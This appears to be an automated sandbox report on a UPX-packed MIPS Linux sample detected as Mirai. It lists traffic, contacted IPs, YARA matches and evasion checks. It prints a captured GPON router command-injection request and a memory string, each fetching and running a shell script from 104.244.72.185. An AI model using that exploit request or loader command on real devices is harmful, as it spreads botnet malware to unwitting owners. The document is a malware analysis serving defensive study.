Source: unknown Network traffic detected: HTTP traffic on port 60740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38384
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37298
Source: unknown Network traffic detected: HTTP traffic on port 46042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54206
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39238
Source: unknown Network traffic detected: HTTP traffic on port 50996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41548
Source: unknown Network traffic detected: HTTP traffic on port 34116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41544
Source: unknown Network traffic detected: HTTP traffic on port 34676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42470
Source: unknown Network traffic detected: HTTP traffic on port 54578 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33516
Source: unknown Network traffic detected: HTTP traffic on port 47770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 46828
Source: unknown Network traffic detected: HTTP traffic on port 39550 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 48362 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50662 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40040
Source: unknown Network traffic detected: HTTP traffic on port 50952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32898
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54622
Source: unknown Network traffic detected: HTTP traffic on port 44492 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59314 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59088
Source: unknown Network traffic detected: HTTP traffic on port 39584 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39148 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43780
Source: unknown Network traffic detected: HTTP traffic on port 33900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34826
Source: unknown Network traffic detected: HTTP traffic on port 58768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44624
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45950
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38180
Source: unknown Network traffic detected: HTTP traffic on port 35966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36640 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 33200 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54884
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53552
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35900
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50288
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54646
Source: unknown Network traffic detected: HTTP traffic on port 51154 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52472
Source: unknown Network traffic detected: HTTP traffic on port 51578 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42434
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45940
Source: unknown Network traffic detected: HTTP traffic on port 52858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41184
Source: unknown Network traffic detected: HTTP traffic on port 51522 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55426 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55564 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35974
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34642
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33320
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55110
Source: unknown Network traffic detected: HTTP traffic on port 56110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 33360 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44206
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47714
Source: unknown Network traffic detected: HTTP traffic on port 42742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 46622
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44682
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44684
Source: unknown Network traffic detected: HTTP traffic on port 34262 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56444
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56202
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35970
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52092
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52098
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54274
Source: unknown Network traffic detected: HTTP traffic on port 54100 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47944
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47700
Source: unknown Network traffic detected: HTTP traffic on port 60470 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37298 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44624 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33538
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57552
Source: unknown Network traffic detected: HTTP traffic on port 53984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55370
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54044
Source: unknown Network traffic detected: HTTP traffic on port 55844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 48236 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40066
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42482
Source: unknown Network traffic detected: HTTP traffic on port 32790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50926
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35940
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45508
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52166 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44658
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44492
Source: unknown Network traffic detected: HTTP traffic on port 34148 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52276
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58810
Source: unknown Network traffic detected: HTTP traffic on port 44074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44658 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33360
Source: unknown Network traffic detected: HTTP traffic on port 54122 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43394
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45572
Source: unknown Network traffic detected: HTTP traffic on port 44508 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53458 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 45064 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58468 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36620
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34676
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33352
Source: unknown Network traffic detected: HTTP traffic on port 51530 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52982 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45566
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 46656
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43388
Source: unknown Network traffic detected: HTTP traffic on port 35940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51146 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43218 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 45508 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38438 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43386
Source: unknown Network traffic detected: HTTP traffic on port 37554 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 46228 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35566 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44460 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55564
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57742
Source: unknown Network traffic detected: HTTP traffic on port 55260 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38576 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56656
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34674
Source: unknown Network traffic detected: HTTP traffic on port 43064 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37934
Source: unknown Network traffic detected: HTTP traffic on port 60050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45318
Source: unknown Network traffic detected: HTTP traffic on port 40066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43130
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44460
Source: unknown Network traffic detected: HTTP traffic on port 34126 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58846
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44206 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38296 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35984
Source: unknown Network traffic detected: HTTP traffic on port 36708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34660
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48818
Source: unknown Network traffic detected: HTTP traffic on port 60342 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 36280 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43080
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34126
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57254
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57494
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58580
Source: unknown Network traffic detected: HTTP traffic on port 38506 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56160
Source: unknown Network traffic detected: HTTP traffic on port 51674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37872
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34116
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55086
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60664
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38712
Source: unknown Network traffic detected: HTTP traffic on port 34660 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 41264 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36486 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34364
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59200
Source: unknown Network traffic detected: HTTP traffic on port 55086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43064
Source: unknown Network traffic detected: HTTP traffic on port 54884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 47086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45002
Source: unknown Network traffic detected: HTTP traffic on port 48652 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45240
Source: unknown Network traffic detected: HTTP traffic on port 38448 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36772
Source: unknown TCP traffic detected without corresponding DNS query: 181.178.147.0
Source: unknown TCP traffic detected without corresponding DNS query: 181.205.125.52
Source: unknown TCP traffic detected without corresponding DNS query: 181.156.172.2
Source: unknown TCP traffic detected without corresponding DNS query: 181.255.190.113
Source: unknown TCP traffic detected without corresponding DNS query: 181.163.174.61
Source: unknown TCP traffic detected without corresponding DNS query: 181.254.168.183
Source: unknown TCP traffic detected without corresponding DNS query: 181.148.173.172
Source: unknown TCP traffic detected without corresponding DNS query: 181.89.223.188
Source: unknown TCP traffic detected without corresponding DNS query: 181.141.144.41
Source: unknown TCP traffic detected without corresponding DNS query: 181.96.172.0
Source: unknown TCP traffic detected without corresponding DNS query: 181.251.58.0
Source: unknown TCP traffic detected without corresponding DNS query: 181.33.125.171
Source: unknown TCP traffic detected without corresponding DNS query: 181.143.111.171
Source: unknown TCP traffic detected without corresponding DNS query: 181.197.45.65
Source: unknown TCP traffic detected without corresponding DNS query: 181.236.212.125
Source: unknown TCP traffic detected without corresponding DNS query: 181.25.57.187
Source: unknown TCP traffic detected without corresponding DNS query: 181.103.196.92
Source: unknown TCP traffic detected without corresponding DNS query: 181.21.133.4
Source: unknown TCP traffic detected without corresponding DNS query: 181.148.130.152
Source: unknown TCP traffic detected without corresponding DNS query: 181.22.19.236
Source: unknown TCP traffic detected without corresponding DNS query: 181.12.15.136
Source: unknown TCP traffic detected without corresponding DNS query: 181.161.43.147
Source: unknown TCP traffic detected without corresponding DNS query: 181.53.140.87
Source: unknown TCP traffic detected without corresponding DNS query: 181.66.29.144
Source: unknown TCP traffic detected without corresponding DNS query: 181.189.178.42
Source: unknown TCP traffic detected without corresponding DNS query: 181.143.238.153
Source: unknown TCP traffic detected without corresponding DNS query: 181.92.243.77
Source: unknown TCP traffic detected without corresponding DNS query: 181.183.30.87
Source: unknown TCP traffic detected without corresponding DNS query: 181.160.164.243
Source: unknown TCP traffic detected without corresponding DNS query: 181.168.28.199
Source: unknown TCP traffic detected without corresponding DNS query: 181.192.243.15
Source: unknown TCP traffic detected without corresponding DNS query: 181.130.29.138
Source: unknown TCP traffic detected without corresponding DNS query: 181.191.149.250
Source: unknown TCP traffic detected without corresponding DNS query: 181.0.115.52
Source: unknown TCP traffic detected without corresponding DNS query: 181.90.100.173
Source: unknown TCP traffic detected without corresponding DNS query: 181.148.91.131
Source: unknown TCP traffic detected without corresponding DNS query: 181.160.143.15
Source: unknown TCP traffic detected without corresponding DNS query: 181.62.48.89
Source: unknown TCP traffic detected without corresponding DNS query: 181.80.169.52
Source: unknown TCP traffic detected without corresponding DNS query: 181.218.203.87
Source: unknown TCP traffic detected without corresponding DNS query: 181.116.22.207
Source: unknown TCP traffic detected without corresponding DNS query: 181.248.47.247
Source: unknown TCP traffic detected without corresponding DNS query: 181.80.198.14
Source: unknown TCP traffic detected without corresponding DNS query: 181.182.59.161
Source: unknown TCP traffic detected without corresponding DNS query: 181.71.186.183
Source: unknown TCP traffic detected without corresponding DNS query: 181.30.59.60
Source: unknown TCP traffic detected without corresponding DNS query: 181.49.84.234
Source: unknown TCP traffic detected without corresponding DNS query: 181.32.146.106
Source: unknown TCP traffic detected without corresponding DNS query: 181.209.246.30
Source: unknown TCP traffic detected without corresponding DNS query: 181.36.226.174
Source: HCyigyiCAH, 5287.1.00000000750bc847.00000000b3b30f16.r-x.sdmp String found in binary or memory: http://104.244.72.185/bins/Rakitin.mips%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=10392301
Source: HCyigyiCAH, 5287.1.00000000750bc847.00000000b3b30f16.r-x.sdmp String found in binary or memory: http://104.244.72.185/bins/Rakitin.sh
Source: HCyigyiCAH String found in binary or memory: http://upx.sf.net
Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 34 2e 32 34 34 2e 37 32 2e 31 38 35 2f 62 69 6e 73 2f 52 61 6b 69 74 69 6e 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.72.185/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0

System Summary:

barindex
Sample contains only a LOAD segment without any section mappings
Source: LOAD without section mappings Program segment: 0x100000
Yara signature match
Source: HCyigyiCAH, type: SAMPLE Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: classification engine Classification label: mal72.troj.evad.lin@0/0@0/0
Source: HCyigyiCAH Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link

Data Obfuscation:

barindex
Sample is packed with UPX
Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

Hooking and other Techniques for Hiding and Protection:

barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48002
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48030
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48034
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 47980
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48066
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48068
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48070
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48046
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48074
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48078
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48082
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48080
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48090
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48092
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48098
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48100
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48088
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48120
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48152
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45110
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45112
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45132
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45132
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45140
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45160
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45168
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45170
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45174
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45194
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45210

Malware Analysis System Evasion:

barindex
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/HCyigyiCAH (PID: 5287) Queries kernel information via 'uname': Jump to behavior
Source: HCyigyiCAH, 5287.1.000000009f971e6a.0000000014ba5497.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/HCyigyiCAHSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/HCyigyiCAH
Source: HCyigyiCAH, 5287.1.0000000096cd3abf.00000000313fed4c.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mips
Source: HCyigyiCAH, 5287.1.000000009f971e6a.0000000014ba5497.rw-.sdmp Binary or memory string: /usr/bin/qemu-mips
Source: HCyigyiCAH, 5287.1.0000000096cd3abf.00000000313fed4c.rw-.sdmp Binary or memory string: V!/etc/qemu-binfmt/mips

Stealing of Sensitive Information:

barindex
Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality:

barindex
Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
181.46.204.107
 unknown Argentina
27747 TelecentroSAAR false
62.138.220.15
 unknown Germany
61157 PLUSSERVER-ASN1DE false
37.151.211.126
 unknown Kazakhstan
9198 KAZTELECOM-ASKZ false
101.40.10.176
 unknown China
4847 CNIX-APChinaNetworksInter-ExchangeCN false
109.175.65.215
 unknown Bosnia and Herzegowina
9146 BIHNETBIHNETAutonomusSystemBA false
181.61.167.21
 unknown Colombia
10620 TelmexColombiaSACO false
118.228.182.130
 unknown China
4538 ERX-CERNET-BKBChinaEducationandResearchNetworkCenter false
178.157.234.63
 unknown Denmark
43557 ASEMNETDK false
178.30.53.85
 unknown Sweden
2119 TELENOR-NEXTELTelenorNorgeASNO false
181.92.104.192
 unknown Argentina
7303 TelecomArgentinaSAAR false
178.240.16.188
 unknown Turkey
16135 TURKCELL-ASTurkcellASTR false
213.41.59.84
 unknown United Kingdom
8220 COLTCOLTTechnologyServicesGroupLimitedGB false
62.145.208.27
 unknown Netherlands
33915 TNF-ASNL false
101.128.206.187
 unknown Japan 2497 IIJInternetInitiativeJapanIncJP false
62.39.77.44
 unknown France
29322 STREAMWIDE-ASThecompanySTREAMWIDElocatedinParisFranc false
181.245.56.237
 unknown Colombia
26611 COMCELSACO false
181.126.96.73
 unknown Paraguay
23201 TelecelSAPY false
178.241.199.89
 unknown Turkey
16135 TURKCELL-ASTurkcellASTR false
101.196.10.91
 unknown China
58519 CHINATELECOM-CTCLOUDCloudComputingCorporationCN false
178.150.123.196
 unknown Ukraine
13188 TRIOLANUA false
101.97.233.46
 unknown Japan 17941 BIT-ISLEEquinixJpapanEnterpriseKKJP false
109.158.239.20
 unknown United Kingdom
2856 BT-UK-ASBTnetUKRegionalnetworkGB false
2.17.183.129
 unknown European Union
16625 AKAMAI-ASUS false
37.222.252.54
 unknown Spain
12430 VODAFONE_ESES false
181.60.189.160
 unknown Colombia
10620 TelmexColombiaSACO false
204.67.230.201
 unknown United States
1761 TDIR-CAPNETUS false
181.26.83.248
 unknown Argentina
22927 TelefonicadeArgentinaAR false
148.35.90.206
 unknown United States
6400 CompaniaDominicanadeTelefonosSADO false
101.87.127.238
 unknown China
4812 CHINANET-SH-APChinaTelecomGroupCN false
170.41.187.216
 unknown United States
26034 ASN-DELTA-OUTUS false
181.122.188.201
 unknown Paraguay
23201 TelecelSAPY false
62.10.234.129
 unknown Italy
8612 TISCALI-IT false
181.43.42.48
 unknown Chile
6471 ENTELCHILESACL false
62.248.16.18
 unknown Turkey
9121 TTNETTR false
119.26.236.136
 unknown Japan 9617 ZAQJupiterTelecommunicationsCoLtdJP false
170.50.81.25
 unknown United States
11406 CIGNA-1US false
210.182.40.99
 unknown Korea Republic of
3786 LGDACOMLGDACOMCorporationKR false
212.240.174.250
 unknown United Kingdom
2529 DEMON-INTERNETNowmaintainedbyCableWirelessWorldwide false
118.37.22.216
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
178.184.52.178
 unknown Russian Federation
12389 ROSTELECOM-ASRU false
2.175.19.200
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
181.71.150.145
 unknown Colombia
27831 ColombiaMovilCO false
210.194.84.10
 unknown Japan 9824 JTCL-JP-ASJupiterTelecommunicationCoLtdJP false
62.14.165.100
 unknown Spain
12479 UNI2-ASES false
178.214.2.148
 unknown Poland
51390 MTMINFO-ASPL false
62.14.165.103
 unknown Spain
12479 UNI2-ASES false
178.126.238.255
 unknown Belarus
6697 BELPAK-ASBELPAKBY false
62.198.53.86
 unknown Denmark
3308 TELIANET-DENMARKDK false
79.83.229.112
 unknown France
15557 LDCOMNETFR false
178.80.227.177
 unknown Saudi Arabia
35819 MOBILY-ASEtihadEtisalatCompanyMobilySA false
119.228.70.246
 unknown Japan 17511 OPTAGEOPTAGEIncJP false
122.33.60.159
 unknown Korea Republic of
17858 POWERVIS-AS-KRLGPOWERCOMMKR false
118.115.53.3
 unknown China
38283 CHINANET-SCIDC-AS-APCHINANETSiChuanTelecomInternetData false
212.170.182.203
 unknown Spain
3352 TELEFONICA_DE_ESPANAES false
79.169.109.106
 unknown Portugal
2860 NOS_COMUNICACOESPT false
125.145.135.186
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
178.197.159.183
 unknown Switzerland
3303 SWISSCOMSwisscomSwitzerlandLtdCH false
178.31.122.87
 unknown Sweden
2119 TELENOR-NEXTELTelenorNorgeASNO false
223.9.8.107
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
210.247.141.253
 unknown Australia
7496 WEBCENTRAL-ASWebCentralAU false
101.169.50.223
 unknown Australia
1221 ASN-TELSTRATelstraCorporationLtdAU false
119.116.113.197
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
213.200.224.33
 unknown Switzerland
3303 SWISSCOMSwisscomSwitzerlandLtdCH false
178.126.238.249
 unknown Belarus
6697 BELPAK-ASBELPAKBY false
178.234.186.75
 unknown Russian Federation
12389 ROSTELECOM-ASRU false
178.179.179.6
 unknown Russian Federation
25159 SONICDUO-ASRU false
101.182.119.61
 unknown Australia
1221 ASN-TELSTRATelstraCorporationLtdAU false
213.90.31.52
 unknown Austria
8437 UTA-ASAT false
170.80.8.12
 unknown Colombia
22368 TELEBUCARAMANGASAESPCO false
42.213.107.155
 unknown China
4249 LILLY-ASUS false
178.135.120.15
 unknown Lebanon
42003 OGERONETOGEROTelecomLB false
213.90.31.54
 unknown Austria
8437 UTA-ASAT false
79.114.177.238
 unknown Romania
8708 RCS-RDS73-75DrStaicoviciRO false
178.103.193.185
 unknown United Kingdom
12576 EELtdGB false
62.246.7.47
 unknown Germany
12312 ECOTELDE false
157.62.32.89
 unknown United States
22192 SSHENETUS false
62.215.172.86
 unknown Kuwait
21050 FAST-TELCOKW false
62.31.100.67
 unknown United Kingdom
5089 NTLGB false
181.228.149.57
 unknown Argentina
10481 TelecomArgentinaSAAR false
89.112.89.222
 unknown Russian Federation
20597 ELTEL-ASRU false
178.153.204.193
 unknown Qatar
42298 GCC-MPLS-PEERINGGCCMPLSpeeringQA false
178.105.88.161
 unknown United Kingdom
12576 EELtdGB false
212.161.92.233
 unknown United Kingdom
8220 COLTCOLTTechnologyServicesGroupLimitedGB false
213.216.152.83
 unknown United Kingdom
1273 CWVodafoneGroupPLCEU false
178.42.85.134
 unknown Poland
5617 TPNETPL false
178.13.237.203
 unknown Germany
3209 VODANETInternationalIP-BackboneofVodafoneDE false
170.27.162.169
 unknown United States
23410 NET-NASSAU-BOCESUS false
170.0.2.227
 unknown Brazil
264957 CoopercitrusCooperativadeProdutoresRuraisBR false
42.158.0.170
 unknown China
